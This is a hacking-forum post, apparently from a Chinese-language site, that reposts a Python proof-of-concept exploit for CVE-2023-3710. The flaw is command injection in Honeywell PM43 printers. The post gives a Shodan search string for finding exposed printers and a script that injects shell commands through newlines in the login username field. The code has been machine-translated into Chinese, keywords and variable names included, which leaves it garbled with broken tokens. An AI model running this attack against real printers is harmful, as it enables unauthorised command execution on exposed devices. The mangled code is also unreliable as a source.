H

Honeywell PM43 P10.19.050004-远程代码执行(RCE)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#-利用标题: Honeywell PM43 P10.19.050004-远程代码执行(RCE)
#-Shodan Dork: http.title:pm43,pm43
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-Fimware版本:版本在P10.19.050004之前
# - 在: P10.17.019667上测试
#-CVE : CVE-2023-3710
导入请求
导入argparse
蓝色='\ 033 [94m'
黄色='\ 033 [93m'
reset='\ 033 [0M'
def Banner():
横幅='''
╔════════════════════════════════════════════════╗
CVE-2023-3710
霍尼韦尔PM43打印机注射命令
作者:字节猎人
╚════════════════════════════════════════════════╝
'''
打印(黄色+横幅+重置)
def run_command(url,命令):
full_url=f'{url}/loadfile.lp?pageId=configure'
有效载荷={
'username': f'hunt \ n {command} \ n',
'userpassword':'Admin12345Admin !'
}
TRY:
响应=requests.post(full_url,data=有效载荷,verify=false)
response_text=wendesp.text
html_start_index=response_text.find('html')
如果html_start_index!=-1:
返回响应_text [:HTML_START_INDEX]
其他:
返回响应_text
除了requests.exceptions.requestexception为e:
返回f'Error: {e}'
def main():
parser=argparse.argumentparser(Description='Honeywell PM43打印机的命令注入POC')
parser.add_argument(' - url',dest='url',help='target url',必需=true)
parser.add_argument(' - run',dest='命令',help='命令执行',quilt quirck=true)
args=parser.parse_args()
响应=run_command(args.url,args.command)
print(f'{blue} {wendesp} {reset}')
如果name=='__ -Main __':
横幅()
主要的()
 
后退
顶部